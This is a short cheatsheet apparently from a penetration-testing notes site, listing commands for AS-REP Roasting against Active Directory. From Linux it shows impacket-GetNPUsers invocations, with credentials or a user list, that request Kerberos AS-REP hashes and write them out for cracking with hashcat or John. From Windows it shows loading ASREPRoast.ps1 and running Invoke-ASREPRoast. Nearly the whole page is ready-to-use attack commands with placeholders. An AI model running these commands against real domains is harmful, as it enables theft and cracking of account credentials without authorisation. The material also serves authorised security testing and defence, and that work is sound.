AS-REP Roasting
Cheatsheet with commands for performing AS-REP Roasting from the outside and inside.
From Linux:
impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <hashcat/john> -outputfile <output>impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txtFrom Windows:
Import-Module .\ASREPRoast.ps1Invoke-ASREPRoastLast updated